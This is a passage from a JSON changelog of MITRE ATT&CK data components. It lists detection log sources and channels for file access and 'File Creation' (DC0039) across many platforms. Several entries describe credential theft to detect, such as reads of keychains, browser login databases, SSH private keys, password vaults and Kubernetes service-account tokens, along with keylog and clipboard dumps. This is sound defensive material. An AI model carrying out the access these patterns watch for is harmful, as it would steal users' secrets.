                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "read: Access to sensitive log files by non-admin users"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "datastore/log file access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "vSphere File API Access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "file copy or datastore upload via HTTPS"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "guest OS outbound transfer logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMFS access logs"
                        },
                        {
                            "name": "esxis:vmkernel",
                            "channel": "Datastore Access"
                        },
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "File system access events with kFSEventStreamEventFlagItemRemoved, kFSEventStreamEventFlagItemRenamed flags for environmental artifact collection (/System/Library, /usr/sbin, plist files)"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating access to system configuration files and environmental information sources"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "File Access Monitor"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Disk Activity Tracing"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "filesystem activity"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Filesystem Call Monitoring"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "read/write"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file open for known browser cookie paths"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file reads/writes from /Volumes/"
                        },
                        {
                            "name": "fs:quarantine",
                            "channel": "/var/log/quarantine.log"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Write operations to storage"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "GET or LIST requests to /var/run/secrets/kubernetes.io/serviceaccount/ followed by access to the Kubernetes API server"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "/proc/*/maps access"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "auth.log or custom tool logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "/var/log/syslog"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel messages related to cryptographic operations, module loading, and filesystem access patterns"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed, MailboxAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Bulk downloads or API extractions from Microsoft-hosted data repositories (e.g., Dynamics 365)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN: Open of .dylib/.so in user-writable locations"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "open: Process opens AppleCamera/IOUSB device nodes or AVFoundation frameworks"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "open or read syscall to ~/.bash_history"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_open, es_event_exec"
                        },
                        {
                            "name": "macos:keychain",
                            "channel": "Access to Keychain DB or system.keychain"
                        },
                        {
                            "name": "macos:keychain",
                            "channel": "~/Library/Keychains, /Library/Keychains"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access to ~/Library/*/Safari or Chrome directories by non-browser processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Kerberos framework calls to API:{uuid} cache outside normal process lineage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "~/Library/Application Support/Google/Chrome/*/Login Data OR ~/Library/Application Support/Firefox/*/logins.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Read access to Time Machine plist files or CCC configurations in ~/Library/Preferences/"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - file subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file read of sensitive directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Abnormal process access to Safari or Chrome cookie storage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open: Access to /var/log/system.log or related security event logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open/read of *.plist or .env files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read of user document directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read access to ~/Library/Keychains/login.keychain-db"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "filesystem and process events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read access to ~/Library/Keychains or history files by terminal processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access to /Volumes/SharePoint or network mount"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access to ~/Library/Safari/Bookmarks.plist or recent files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access to keychain database"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - file provider subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read/write of user documents prior to upload"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open/read access to private key files (id_rsa, *.pem, *.p12)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read: File access to /System/Library/Extensions/ or related kernel extension paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "*.opvault OR *.ldb OR *.kdbx"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Recent download opened or executed"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "Suspicious file execution on removable media path"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:39:07.536000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"macOS:unifiedlog\", \"channel\": \"looking for file access to scripts with abnormal encoding patterns\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"android:logcat\", \"channel\": \"READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"android:logcat\", \"channel\": \"KeyChain/AndroidKeyStore read of token alias\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"android:logcat\", \"channel\": \"READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow\"}, \"root['x_mitre_log_sources'][40]\": {\"name\": \"auditd:SYSCALL\", \"channel\": \"attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID\"}, \"root['x_mitre_log_sources'][67]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle\"}, \"root['x_mitre_log_sources'][68]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\\\\\ My\\\\\\\\ iPhone with >N distinct paths in TimeWindow\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Recent download opened or executed\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 17:17:05.280000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0039",
                            "external_id": "DC0039"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Creation",
                    "description": "A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs). ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=11"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "creat"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file write"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE/MODIFY: Modification of app.asar inside .app bundle"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "File creation with name starting with '.'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation or modification of browser extension .plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or creat syscalls targeting excluded paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file creation in AV exclusion directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file creation/modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file write/create"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "file write"
                        },
                        {
                            "name": "snmp:syslog",
                            "channel": "firmware write/log event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,creat,rename: Writes in $HOME/Downloads, /tmp, ~/.cache with exe/script/archive/office extensions"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Create in /Users/*/Downloads or /private/var/folders/* with quarantine attribute"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file events"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMFS file creation"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write/open, FIM audit"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "open/write/exec calls"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .plist under /Library/Managed Preferences/"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "creat"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "disk activity on /Library/LaunchAgents or LaunchDaemons"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: Write to ~/.vscode-cli/code_tunnel.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "creation of ~/.vscode-cli/code_tunnel.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create/modify dylib files in monitored directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "New files in /tmp, /var/tmp, $HOME/.cache, executed within TimeWindow after browser HTTP fetch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "New files written to /var/folders, /tmp, ~/Library/Caches, or ~/Downloads by browser context or its children"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: New file created in system binaries or temp directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File created in ~/Library/LaunchAgents or executable directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, unlink, rename: File creation or deletion involving critical stored data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process wrote large .mov/.mp4 in user temp/hidden dirs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "logd:file write"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "File IO"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "creat, open, write on /etc/systemd/system and /usr/lib/systemd/system"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Attachment files written to ~/Downloads or temporary folders"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file activity"
                        },
                        {
                            "name": "CloudTrail:PutObject",
                            "channel": "PutObject"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "Creation of files with extensions .sql, .csv, .sqlite, especially in user directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Writes of .sql/.csv/.xlsx files to user documents/downloads"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "New .py/.js/.sh files written to ~/.local/, ~/.cache/, or /tmp/ within 5 min of package install"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write, open, or rename to /etc/systemd/system/*.service"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of .zip, .gz, .bz2 files in /tmp, /var/tmp, or /home directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip, .gz, .dmg archives in /Users, /tmp, or application directories"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file open/write"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_CREATE: path under /Users/*/(Downloads|Desktop|Library/*/Containers|Library/Group Containers) AND extension in SuspiciousExtensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/create/rename: name in (/home/*/Downloads/*|/tmp/*|/run/user/*|/media/*) AND ext in SuspiciousExtensions"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of archive files in /tmp, /var/tmp, or user home directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip, .dmg, .tar.gz files in /Users, /tmp, or application directories"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File Events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "File creations of *.qcow2, *.vdi, *.vmdk outside standard VM directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation or modification of postinstall scripts within .pkg or .mpkg contents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: File creation under /tmp, /var/tmp, ~/.cache with executable bit or shell shebang"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create: New files in /tmp or ~/Library/Application Support/* with executable or script extensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write, unlink"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "File creation of suspicious scripts/binaries in temporary directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation of unsigned binaries/scripts in user cache or download directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "File creation events in /var/mail or /var/spool/mail exceeding baseline thresholds"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "create: Attachment file creation in ~/Library/Mail directories"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Shell-Core",
                            "channel": "New startup folder shortcut or binary placed in Startup directory"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write or create file after .bash_history access"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "new file created in /var/www/html, /srv/http, or similar web root"
                        },
                        {
                            "name": "fs:launchdaemons",
                            "channel": "file_create"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "mount target path within /proc/*"
                        },
                        {
                            "name": "macos:fsevents",
                            "channel": "/Library/StartupItems/, ~/Library/LaunchAgents/"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "write or chmod to ~/Library/LaunchAgents/*.plist"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "creation of .so files in non-standard directories (e.g., /tmp, /home/*)"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of files with anomalous headers and entropy levels in /tmp or user directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of files with anomalous headers and entropy values"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Access or modification to /lib/modules or creation of .ko files"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Directory events (kFSEventStreamEventFlagItemCreated)"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "drive.activity logs"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "create/write/rename in user-writable paths"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "WRITE: Drop of binaries/scripts in ~/.local, /tmp, or /opt tool dirs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE/MODIFY: Creation of LaunchAgents/Daemons plists in user/system locations"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,create"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Creation of hidden files (.*) in sensitive directories (/etc, /var, /usr/bin)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of LaunchAgents/LaunchDaemons in hidden or non-standard directories"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of files ending in .tar, .gz, .bz2, .zip in /tmp or /var/tmp"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip or .dmg files in user-accessible or temporary directories"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file write"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_open"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file create or modify in /etc/emond.d/rules or /private/var/db/emondClients"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,creat,rename,write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Writes under ~/Library/Application Support/Code*/extensions or JetBrains plugins"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "PutObject"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "large file write originating from /mnt/usb or external mounted storage"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 17:17:05.280000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][89]\": {\"name\": \"android:logcat\", \"channel\": \"App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"android:logcat\", \"channel\": \"App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  \"}, \"root['x_mitre_log_sources'][92]\": {\"name\": \"android:logcat\", \"channel\": \"Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/\"}, \"root['x_mitre_log_sources'][94]\": {\"name\": \"android:logcat\", \"channel\": \"Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy\"}, \"root['x_mitre_log_sources'][95]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy\"}, \"root['x_mitre_log_sources'][96]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)\"}, \"root['x_mitre_log_sources'][99]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)\"}, \"root['x_mitre_log_sources'][100]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\\\\\.db|\\\\\\\\.txt|\\\\\\\\.log\"}, \"root['x_mitre_log_sources'][101]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container\"}, 